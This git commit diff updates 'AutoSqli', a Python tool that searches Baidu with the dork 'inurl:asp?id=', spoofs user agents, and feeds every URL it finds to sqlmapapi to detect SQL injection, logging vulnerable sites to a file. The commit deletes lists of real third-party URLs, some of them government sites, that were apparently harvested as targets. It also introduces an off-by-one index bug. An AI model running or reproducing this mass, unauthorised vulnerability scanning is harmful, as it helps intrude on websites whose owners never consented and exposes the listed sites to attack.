happy birthday KB

This commit is contained in:
jingbo-you
2016-08-02 14:56:15 +08:00
parent 84a098efbb
commit 4d9755bf5e
9 changed files with 107 additions and 78 deletions

2
.gitignore vendored
View File

@@ -1,4 +1,4 @@
*.pyc
.DS_Store
*.log
data/
data/*.*

View File

@@ -1,20 +1,22 @@
#!/usr/bin/python
#-*-coding:utf-8-*-
from __future__ import absolute_import, print_function
import requests
import time
import json
import threading
import Queue
from search.baidu import *
from search import baidu
import logging
from config import LOG, API_URL
class AutoSqli(object):
"""
使用sqlmapapi的方法进行与sqlmapapi建立的server进行交互
"""
def __init__(self, server='', target='',data = '',referer = '',cookie = ''):
super(AutoSqli, self).__init__()
self.server = server
@@ -28,17 +30,22 @@ class AutoSqli(object):
self.referer = referer
self.cookie = cookie
self.start_time = time.time()
self.logger = logging.getLogger('app.run')
self.logger.info('Creating an instance of AutoSqli for {0}.'.format(self.target))
def task_new(self):
self.taskid = json.loads(
requests.get(self.server + 'task/new').text)['taskid']
#print 'Created new task: ' + self.taskid
if len(self.taskid) > 0:
return True
return False
try:
self.taskid = json.loads(
requests.get(self.server + 'task/new').text)['taskid']
#print 'Created new task: ' + self.taskid
if len(self.taskid) > 0:
return True
return False
except ConnectionError:
self.logging.error("sqlmapapi.py is not running")
def task_delete(self):
json_kill=requests.get(self.server + 'task/' + self.taskid + '/delete').text
json_kill = requests.get(self.server + 'task/' + self.taskid + '/delete').text
# if json.loads(requests.get(self.server + 'task/' + self.taskid + '/delete').text)['success']:
# #print '[%s] Deleted task' % (self.taskid)
# return True
@@ -46,7 +53,7 @@ class AutoSqli(object):
def scan_start(self):
headers = {'Content-Type': 'application/json'}
print "starting to scan "+ self.target +".................."
self.logger.debug("Starting to scan "+ self.target +"..................")
payload = {'url': self.target}
url = self.server + 'scan/' + self.taskid + '/start'
t = json.loads(
@@ -74,9 +81,10 @@ class AutoSqli(object):
#print 'not injection\t'
pass
else:
f=open('data/injection.txt','a')
f = open('data/injection.txt','a')
f.write(self.target+'\n')
print 'injection \t'
f.close()
self.logger.warning('injection \t')
def option_set(self):
headers = {'Content-Type': 'application/json'}
@@ -134,28 +142,46 @@ class myThread(threading.Thread):
objects=self.q.get()
result=objects.run()
if __name__ == '__main__':
urls=[]
print 'the program starts!'
key='inurl:asp?id='
pages=3
urls=geturl(key,pages)
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--num', default=4, nargs='?', type=int, dest='num', help="Thread num")
parser.add_argument('-p', '--page', default=3, nargs='?', type=int, dest='page', help="Search Page num")
parser.add_argument('-d', '--log', default=LOG["filename"], nargs='?', type=str, dest='log', help="The path of debug log")
args = parser.parse_args()
logger = logging.getLogger('app')
logger.setLevel(LOG["level"])
fh = logging.FileHandler(args.log)
fh.setLevel(LOG["level"])
formatter = logging.Formatter(LOG['format'], LOG["datefmt"])
fh.setFormatter(formatter)
sh = logging.StreamHandler()
sh.setLevel(LOG["level"])
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
urls = []
logger.info('the program starts!')
pages = args.page
key = 'inurl:asp?id='
urls = baidu.geturl(key, pages)
#print urls
workQueue=Queue.Queue()
workQueue = Queue.Queue()
for tar in urls:
s = AutoSqli('http://127.0.0.1:8775', tar)
s = AutoSqli(API_URL, tar)
workQueue.put(s)
threads = []
nloops = range(4) #threads Num
nloops = range(args.num) #threads Num
for i in nloops:
t = myThread(workQueue,i)
t = myThread(workQueue, i)
t.start()
threads.append(t)
for i in nloops:
threads[i].join()
print "Exiting Main Thread"
logger.info("Exiting Main Thread")
if __name__ == '__main__':
main()

View File

@@ -8,7 +8,7 @@
**Useage:**
- 在sqlmap的目录下执行`python sqlmapapi.py -s`进行监听操作。
- 运行AutoSqli.py
- 运行AutoSqli.py `python AutoSqli.py` 参数可通过`-h`查看
**Tips:**
* 这里要注意的是在代码里自定义搜索关键字:`key='inurl:asp?id='`

18
config.py Normal file
View File

@@ -0,0 +1,18 @@
#!/bin/env python
# -*- coding=utf-8 -*-
import logging
API_URL = "http://127.0.0.1:8775"
LEVELS = {'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL}
LOG = {
"level" : LEVELS["debug"],
"filename" : "autosqli.log",
"format" : '[%(asctime)s] %(levelname)-8s %(name)-12s %(message)s',
"datefmt" : '%Y-%m-%d %H:%M:%S'
}

View File

@@ -1,6 +0,0 @@
http://www.lamarche.com.tw/production_detail.php?shop_category=64&sn=248
http://www.70jj.com/shop/index.php?shop_id=1
http://www.cosmax.com.hk/products_detail.php?product_id=17
http://www.etron.com/en/products/u3hc_detial.php?Product_ID=5
http://www.fembooks.com.tw/indexstore.php?product_id=5423
http://www.guangzhouflower.net.cn/product.php?pid=12

View File

@@ -1,20 +0,0 @@
http://www.99166.com/zjinfo.asp?id=5
http://www.yh8z.com/Secondary/guding.asp?Id=68&Parent_ID=18&Type_Class=news&GS_Class=22
http://www.gdkszx.com.cn/ksxx/kszc_show.asp?id=2205
http://www.smxs.gov.cn/viewtexti.asp?id=275079&npage=6
http://www.juancheng.gov.cn/wsbs-view.asp?id=9285
http://rc.sz.zj.cn/company.asp?id=4291
http://www.law-lib.com/fxj/fxj.asp?id=940
http://www.kfws.gov.cn/Article_read.asp?id=2289
http://www.zjghtcm.com/new_show.asp?id=1178
http://www.medsci.cn/sci/journal.asp?id=0bc61099
http://www.dylaw.gov.cn/zhongc/web60/classshow.asp?id=51848&classid=15
http://club.kdnet.net/dispbbs.asp?id=11095423&boardid=1
http://people.rednet.cn/PeopleShow.asp?ID=2410432
http://www.dhzsxx.com/ShowNews.asp?id=1591
http://www.chinawutong.com/co/huoyuan_01/index.asp?id=213633
http://news.chinaxinge.com/shownews.asp?id=53866&sjm=49600b363e048e05
http://www.gxxgty.com/news_show.asp?id=1583
http://szb.keq0475.com/Qnews.asp?ID=49506
http://www.cyfy.cn/kssz.asp?id=42
http://www.szkweekly.com/List.asp?ID=54284

Binary file not shown.

View File

@@ -1,11 +1,16 @@
#coding: utf-8
from __future__ import unicode_literals
import urllib2
import string
import urllib
import re
import random
import logging
user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0', \
__all__ = ["geturl"]
USER_AGENTS = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0', \
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0', \
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533+ \
(KHTML, like Gecko) Element Browser 5.0', \
@@ -18,26 +23,31 @@ user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Fire
Chrome/28.0.1468.0 Safari/537.36', \
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; TheWorld)']
def baidu_search(keyword,pn):
p= {'wd': keyword}
res=urllib2.urlopen(("http://www.baidu.com/s?"+urllib.urlencode(p)+"&pn={0}&cl=3&rn=10").format(pn)) #rn为每页的显示数目 pn表示当前显示的是第pn条搜索结果
html=res.read()
logger = logging.getLogger('app.baidu')
def baidu_search(keyword, pn):
p = {'wd': keyword}
res = urllib2.urlopen(("http://www.baidu.com/s?"+urllib.urlencode(p)+"&pn={0}&cl=3&rn=10").format(pn)) #rn为每页的显示数目 pn表示当前显示的是第pn条搜索结果
html = res.read()
return html
def getList(regex,text): #将获取的url去重并存入list
def getList(regex, text): #将获取的url去重并存入list
arr = []
res = re.findall(regex, text)
if res:
for r in res:
arr.append(r)
return arr
def getMatch(regex,text): #匹配函数
def getMatch(regex, text): #匹配函数
res = re.findall(regex, text)
if res:
return res[0]
return ''
def is_get(url): #是否是sqlmap可识别的get型链接
regex=r'(\S*?)\?.*=.*'
res=re.match(regex,url)
regex = r'(\S*?)\?.*=.*'
res = re.match(regex,url)
if res:
#print res.group(1)
return res.group(1)
@@ -46,12 +56,12 @@ def is_get(url): #是否是sqlmap可识别的get型链接
# def Deduplication():
# regex=r'\S'
def geturl(keyword,pages): #获取url
def geturl(keyword, pages): #获取url
targets = []
hosts=[]
hosts = []
for page in range(0,int(pages)):
pn=(page+1)*10
html = baidu_search(keyword,pn)
pn = (page+1)*10
html = baidu_search(keyword, pn)
content = unicode(html, 'utf-8','ignore')
arrList = getList(u"<div class=\"f13\">(.*)</div>", content) #分割页面块
#print arrList
@@ -61,28 +71,29 @@ def geturl(keyword,pages): #获取url
for item in arrList:
regex = u"data-tools='\{\"title\":\"(.*)\",\"url\":\"(.*)\"\}'"
link = getMatch(regex,item)
url=link[1] #获取百度改写url
url = link[1] #获取百度改写url
try:
domain=urllib2.Request(url)
r=random.randint(0,11)
domain.add_header('User-agent', user_agents[r])
domain.add_header('connection','keep-alive')
response=urllib2.urlopen(domain)
uri=response.geturl() #获取真实url
urs=is_get(uri) #是否是传统的get型
domain = urllib2.Request(url)
r = random.randint(0, len(USER_AGENTS))
domain.add_header('User-agent', USER_AGENTS[r])
domain.add_header('connection', 'keep-alive')
response = urllib2.urlopen(domain)
uri = response.geturl() #获取真实url
urs = is_get(uri) #是否是传统的get型
if (uri in targets) or (urs in hosts) :
continue
else:
targets.append(uri)
hosts.append(urs)
f1=open('data/targets.txt','a') #存放url链接
f1 = open('data/targets.txt','a') #存放url链接
f1.write(uri+'\n')
f1.close()
except:
continue
print "urls have been grabed already!!!"
logger.info("urls have been grabed already!!!")
return targets
if __name__ == '__main__':
pass

Binary file not shown.